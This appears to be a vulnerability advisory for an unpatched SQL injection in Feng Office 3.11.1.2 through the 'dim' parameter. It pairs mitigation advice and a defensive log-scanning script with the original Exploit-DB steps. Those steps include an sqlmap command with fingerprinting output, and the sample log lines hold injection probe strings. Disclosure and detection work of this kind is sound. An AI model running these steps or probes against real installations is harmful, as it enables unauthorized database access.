Vendor: Feng Office
By: Andrey Stoykov
CVSS: 6.1 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Feng Office
Affected Version From: 3.11.1.2
Affected Version To: 3.11.1.2
Patch Exists: NO
Related CWE:
CPE: a:feng_office:3.11.1.2
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu 22.04
Year: 2024

Feng Office 3.11.1.2 – SQL Injection

Feng Office 3.11.1.2 is vulnerable to SQL injection through the 'dim' parameter value of an HTTP GET request. With a tool such as SQLMap, an attacker can automate the injection to access or manipulate the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input to prevent SQL injection attacks. Regular security testing and code reviews can also help identify and fix such vulnerabilities.
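
Because the entry lists no patch, web server logs are one place to check whether the 'dim' parameter is being probed. The following is an added example, not code from Feng Office or from the advisory author: it scans Apache access-log lines and reports clients that send 'dim' values that are not plain numeric ids. It assumes that legitimate 'dim' values are decimal integers (the page does not say so); the log lines, IP addresses and PLACEHOLDER_PATH are constructed.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Assumption: legitimate `dim` values are plain decimal ids. Adjust if not.
DIM_OK = re.compile(r"\d{1,10}")
# Apache common/combined prefix: client, identd, user, [time], "request", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample lines (documentation IP ranges, placeholder path).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jul/2024:12:12:58 +0000] "GET /PLACEHOLDER_PATH?dim=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jul/2024:12:13:01 +0000] "GET /PLACEHOLDER_PATH?dim=1%27 HTTP/1.1" 500 310',
    '198.51.100.7 - - [01/Jul/2024:12:13:02 +0000] "GET /PLACEHOLDER_PATH?dim=1%20AND%201%3D1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jul/2024:12:13:03 +0000] "GET /PLACEHOLDER_PATH?dim=1%29%20--%20- HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jul/2024:12:14:10 +0000] "GET /PLACEHOLDER_PATH?dim=2&x=%27 HTTP/1.1" 200 4800',
]


def suspicious_dim_requests(lines):
    """Yield (client, status, decoded dim) for requests whose `dim` is not a plain id."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        client, _method, target, status = m.groups()
        query = urlsplit(target).query
        # parse_qs percent-decodes, so encoded payloads are judged in decoded form.
        for value in parse_qs(query, keep_blank_values=True).get("dim", []):
            if not DIM_OK.fullmatch(value):
                yield client, int(status), value


def summarize(lines, threshold=3):
    """Return {client: count} for clients with at least `threshold` anomalous requests."""
    counts = Counter(client for client, _, _ in suspicious_dim_requests(lines))
    return {client: n for client, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for client, status, value in suspicious_dim_requests(SAMPLE_LOG):
        print(client, status, repr(value))
    print(summarize(SAMPLE_LOG))
```

The same allow-list pattern can be enforced in front of the application (reverse proxy or WAF rule) to reject non-numeric 'dim' values until the query itself is fixed.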

Exploit-DB raw data:

# Exploit Title: Feng Office 3.11.1.2 - SQL Injection
# Date: 7/2024
# Exploit Author: Andrey Stoykov
# Version: 3.11.1.2
# Tested on: Ubuntu 22.04
# Blog: http://msecureltd.blogspot.com


SQL Injection:

1. Login to application
2. Click on "Workspaces"
3. Copy full URL
4. Paste the HTTP GET request into text file
5. Set the injection point to be in the "dim" parameter value
6. Use SQLMap to automate the process

sqlmap -r request.txt --threads 1 --level 5 --risk 3 --dbms=mysql -p dim --fingerprint

[...]
[12:13:03] [INFO] confirming MySQL
[12:13:04] [INFO] the back-end DBMS is MySQL
[12:13:04] [INFO] actively fingerprinting MySQL
[12:13:05] [INFO] executing MySQL comment injection fingerprint
web application technology: Apache
back-end DBMS: active fingerprint: MySQL >= 5.7
               comment injection fingerprint: MySQL 5.7.37
[...]